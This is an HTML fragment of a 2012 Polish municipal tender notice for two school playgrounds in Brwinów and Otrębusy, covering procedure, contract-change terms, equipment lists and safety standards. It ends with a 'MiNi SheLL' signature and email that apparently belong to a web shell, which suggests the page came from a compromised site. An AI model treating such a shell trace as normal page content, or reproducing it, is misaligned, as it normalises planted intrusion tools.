<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia istotnej zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących okolicznościach:
1)	zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych,
2)	zmiany podmiotu trzeciego (podwykonawcy), na którego zasobach Wykonawca potwierdził spełnianie warunków udziału w postępowaniu o udzielenie niniejszego zamówienia publicznego, a nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca, 
3)	zmiany podwykonawców lub zakresu robót wykonywanych przez podwykonawców zgłoszonych przez Wykonawców według postanowień § 9 umowy,
4)	wystąpienie nadzwyczajnych warunków atmosferycznych w szczególności klęsk żywiołowych, uniemożliwiających prowadzenie robót budowlanych,
5)	jeżeli konieczność zmiany terminu wykonania przedmiotu umowy wynikła z okoliczności, niezawinionych przez Wykonawcę, w szczególności została wymuszona oczekiwaniem na uzgodnienia lub wydanie decyzji przez jakikolwiek właściwy organ,
6)	w przypadku wystąpienia okoliczności wstrzymania prowadzonej inwestycji przez czynniki zewnętrzne (np. inne niezależne budowy),
7)	jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.brwinow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY BRWINÓW,  05-840 BRWINÓW, UL.KOŚCIUSZKI 4A, Zespół ds. zamówień publicznych, pokój nr 22..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2012 godzina 13:00, miejsce: URZĄD GMINY BRWINÓW,  05-840 BRWINÓW, UL.GRODZISKA 12, pokój nr 7..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Modernizacja szkolnego placu zabaw przy Zespole Szkół w Otrębusach im. Włodzimierza Puchalskiego i utworzenie szkolnego placu zabaw przy Zespole Szkół Nr 1 w Brwinowie im. Tadeusza Kościuszki - w ramach rządowego programu Radosna szkoła..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja szkolnego placu Zabaw przy Zespole Szkół w Otrębusach im. Włodzimierza Puchalskiego, ul. Piaseckiego 2 - w ramach rządowego programu Radosna szkoła..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ NR 1: Modernizacja szkolnego placu zabaw przy Zespole Szkół w Otrębusach im. Włodzimierza Puchalskiego na terenie o pow. ok. 500 m2
Planowana lokalizacja i opis terenu: Plac położony niedaleko boiska szkolnego, na terenie zadrzewionym. Z jednej strony znajduje się szpaler drzew z drugiej żywopłot. Teren pokryty zachwaszczoną darnią i na ok.. 100 m2 starymi płytami betonowymi
1) Przedmiot zamówienia należy wykonać zgodnie z wytycznymi Ministerstwa Edukacji Narodowej dotyczącymi programu rządowego RADOSNA SZKOŁA.
2) Wykonanie przedmiotu zamówienia zgodnie ze normą PN-EN-1176 i PN-EN-1177.
3) Przygotowanie terenu pod plac zabaw zgodnie ze sztuką budowlaną (wyrównanie terenu, usunięcie zbędnych, korzeni) - zdjęcie warstwy humusu o grubości ok. 30 cm wraz z wywiezieniem oraz  usunięciem ok. 100m2 płyt betonowych wraz z wywiezieniem we wskazane przez Zamawiającego miejsce, które będą kolidować z budowanym placem zabaw. Jednocześnie jeżeli stare urządzenia zabawowe znajdujące się sąsiedztwie budowy będą kolidowały z nowym placem podlegają one demontażowi i złożeniu we wskazane na terenie szkoły miejsce.
4) Przygotowanie terenu pod ułożenie nawierzchni bezpiecznej wraz z niezbędną podbudowa zależną od rodzaju użytej nawierzchni bezpiecznej oraz okrawężnikowanie terenu pod nawierzchnię bezpieczną - zgodnie ze sztuka budowlaną
5) Położenie nawierzchni bezpiecznej pod nowe urządzenia spełniającej wymogi Polskich Norm  gumowej lub piankowej amortyzujących upadek w kolorze pomarańczowym (pow. ok. 240 m2 ) -  połączenie nawierzchni bezpiecznych ścieżką (komunikacja )w kolorze niebieskim typu tartan lub inną nawierzchnia syntetyczną (pow. ok. 50 m2). Nawierzchnie zgodnie z wymaganiami programu RADOSNA SZKOŁA. Resztę terenu zagospodarować trawnikiem - pas zieleni min. 210  m2 oraz obsadzić formowanym żywopłotem z roślin zimozielonych (bez kolców, nietrujących) wokół całego placu zabaw.
6) Zakup, dostawa i montaż urządzeń: 
a) Huśtawka wahadłowa,
b) Huśtawka ważka, 
c) Pająk linowy,
d) Ścianka wspinaczkowa,
e) Poręcze gimnastyczne,
f) Drabinka wysoka,
g) Zestaw drążków do podciągania,
h) Równoważnia typu wiszący mostek,
i) Zestaw 2 wież z min.4 elementami np. mostkiem, pochylnią, przeplotnią, zjeżdżalnią.
7)  2 sztuki ławek z oparciami i wieszakami na odzież lub wieszaki oddzielnie, 2 szt. koszy na śmieci, stojak na rowery. 
8) Regulamin placu zabaw zgodny z wymogami programu RADOSNA SZKOŁA.
9) Urządzenia powinny posiadać dominujący kolor niebieski oraz  spełniać wymogi normy PN-EN-1176 i posiadać stosowne certyfikaty bezpieczeństwa i dopuszczenia do stosowania w kontakcie z dziećmi. 
10) Zgodnie z wytycznymi MEN:
a) sprzęt powinien posiadać co najmniej 3-letni okres gwarancji jakości i rękojmi za wady;
b) urządzenia powinny być wykonane z bezpiecznych i trwałych materiałów oraz spełniać wymogi Polskich Norm i warunków bezpieczeństwa, tj. posiadać stosowne certyfikaty bezpieczeństwa i dopuszczenia do stosowania w kontakcie z dziećmi, wg norm EN-1176 i EN-1177; 
c) urządzenia powinny być wykonane w dominującej ich części z metalu ocynkowanego zabezpieczonego farbami lub stali z elementami z innych materiałów odpornych na warunki atmosferyczne, na stopach stalowych ocynkowanych, zakotwiczone w gruncie poprzez zabetonowanie.
Wytyczne MEN znajdują się pod adresem: http://www.men.gov.pl/index.php?option=com_content&view=section&layout=blog&id=61&Itemid=324
2. Zamówienie obejmuje przygotowanie projektu zagospodarowania terenu na właściwych aktualnych mapach do celów projektowych wraz z niezbędnymi załącznikami celem poprawnego zgłoszenia placów zabaw do Starostwa Powiatowego w Pruszkowie. Zgłoszenia dokonuje Wykonawca - zgodnie z wymaganiami prawa budowlanego w tym zakresie.
3. Place zabaw mają być przeznaczone dla dzieci w młodszym wieku szkolnym i dostosowane do ich potrzeb - zgodnie z wytycznymi programu RADOSNA SZKOŁA.
4. Przy każdym urządzeniu mają być zainstalowane czytelne tablice informacyjne pokazujące możliwości i sposób wykorzystania każdego urządzenia. 
5. Regulamin określający zasady korzystania z placu zabaw musi spełniać wymogi programu RADOSNA SZKOŁA.
6. W celu potwierdzenia, że oferowane roboty i dostawy odpowiadają wymaganiom Zamawiającego Wykonawca załączy do oferty szczegółowy opis elementów wyposażenia placu zabaw wraz z ich kolorystyką (zgodnie z wytycznymi MEN)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utworzenie szkolnego placu zabaw przy  Zespole Szkół Nr 1 w Brwinowie im. Tadeusza Kościuszki, ul. Piłsudskiego 11 - w ramach rządowego programu Radosna szkoła..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ NR 2: Utworzenie szkolnego placu zabaw przy  Zespole Szkół Nr 1 w Brwinowie im. Tadeusza Kościuszki pow. terenu ok. 500m2.
Planowana lokalizacja i opis terenu: plac położony jest między boiskami a bieżnią. Od strony ul. Lipowej rosną pojedyncze drzewa, teren porośnięty trawą na terenie przebadanym i włączonym przez konserwatora pod inwestycje zgodnie z załączona mapka.
1) Przedmiot zamówienia należy wykonać zgodnie z wytycznymi Ministerstwa Edukacji Narodowej dotyczącymi programu rządowego RADOSNA SZKOŁA.
2) Wykonanie przedmiotu zamówienia zgodnie z normą PN-EN-1176 i PN-EN-1177.
3) Przygotowanie terenu pod plac zabaw zgodnie ze sztuką budowlaną (wyrównanie terenu, usunięcie zbędnych, korzeni) - zdjęcie warstwy humusu o grubości ok. 30 cm wraz z wywiezieniem ziemi we wskazane miejsce na terenie Gminy Brwinów
4) Przygotowanie terenu pod ułożenie nawierzchni bezpiecznej wraz z niezbędną podbudowa zależna od rodzaju użytej nawierzchni bezpiecznej oraz okrawężnikowanie terenu pod nawierzchnię bezpieczną - zgodnie ze sztuka budowlaną.
5) Położenie nawierzchni bezpiecznej pod nowe urządzenia spełniającej wymogi Polskich Norm  gumowej lub piankowej  amortyzujących upadek w kolorze pomarańczowym (pow. ok. 240 m2)-  połączenie nawierzchni bezpiecznych ścieżką (komunikacja )w kolorze niebieskim typu tartan lub inną nawierzchnia syntetyczną (pow. ok. 50 m2). Nawierzchnie zgodnie z wymaganiami programu RADOSNA SZKOŁA. Resztę terenu zagospodarować trawnikiem - pas zieleni min. 210 m2 oraz obsadzić formowanym żywopłotem z roślin zimozielonych (bez kolców, nietrujących) wokół całego placu zabaw.
6) Wygrodzić teren ogrodzeniem ażurowym z siatki metalowej w kolorze zielonym wzdłuż granic od strony bieżni. O wysokości 1,5 metra - na całej szerokości placyku.
7) Zakup, dostawa i montaż urządzeń: 
a) Zestaw sprawnościowo-rekreacyjny w skład którego wchodzi min. 4 elementy np. baszta, zjeżdżalnia, drabinki, drążki,
b) Ściana wspinaczkowa,
c) Równoważnia na sprężynach,
d) Huśtawka wahadłowa podwójna, 
e) Huśtawka ważka na sprężynie,
f) Huśtawka ważka na podstawie stabilnej ( metalowej ),
g) Bujak sprężynowiec-koniczynka.
8)  2 sztuki ławek z oparciami i wieszakami na odzież lub wieszaki oddzielnie, 2 szt. koszy na śmieci.
9) Regulamin placu zabaw zgodny z wymogami programu RADOSNA SZKOŁA.
10)Urządzenia powinny posiadać dominujący kolor niebieski oraz  spełniać wymogi normy PN-EN-1176 i posiadać stosowne certyfikaty bezpieczeństwa i dopuszczenia do stosowania w kontakcie z dziećmi. 
11) Zgodnie z wytycznymi MEN:
a) sprzęt powinien posiadać co najmniej 3-letni okres gwarancji jakości i rękojmi za wady;
b) urządzenia powinny być wykonane z bezpiecznych i trwałych materiałów oraz spełniać wymogi Polskich Norm i warunków bezpieczeństwa, tj. posiadać stosowne certyfikaty bezpieczeństwa i dopuszczenia do stosowania w kontakcie z dziećmi,  wg norm EN-1176 i EN-1177;
c) urządzenia powinny być wykonane w dominującej ich części z drewna klejonego wysokiej jakości lub metalu ocynkowanego odpowiednio zabezpieczonego farbami albo stali nierdzewnej z elementami z innych materiałów odpornych na warunki atmosferyczne, na stopach stalowych ocynkowanych, zakotwiczone w gruncie poprzez zabetonowanie.
Wytyczne MEN znajdują się pod adresem: http://www.men.gov.pl/index.php?option=com_content&view=section&layout=blog&id=61&Itemid=324
2. Zamówienie obejmuje przygotowanie projektu zagospodarowania terenu na właściwych aktualnych mapach do celów projektowych wraz z niezbędnymi załącznikami celem poprawnego zgłoszenia placów zabaw do Starostwa Powiatowego w Pruszkowie. Zgłoszenia dokonuje Wykonawca - zgodnie z wymaganiami prawa budowlanego w tym zakresie.
3. Place zabaw mają być przeznaczone dla dzieci w młodszym wieku szkolnym i dostosowane do ich potrzeb - zgodnie z wytycznymi programu RADOSNA SZKOŁA.
4. Przy każdym urządzeniu mają być zainstalowane czytelne tablice informacyjne pokazujące możliwości i sposób wykorzystania każdego urządzenia. 
5. Regulamin określający zasady korzystania z placu zabaw musi spełniać wymogi programu RADOSNA SZKOŁA.
6. W celu potwierdzenia, że oferowane roboty i dostawy odpowiadają wymaganiom Zamawiającego Wykonawca załączy do oferty szczegółowy opis elementów wyposażenia placu zabaw wraz z ich kolorystyką (zgodnie z wytycznymi MEN)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com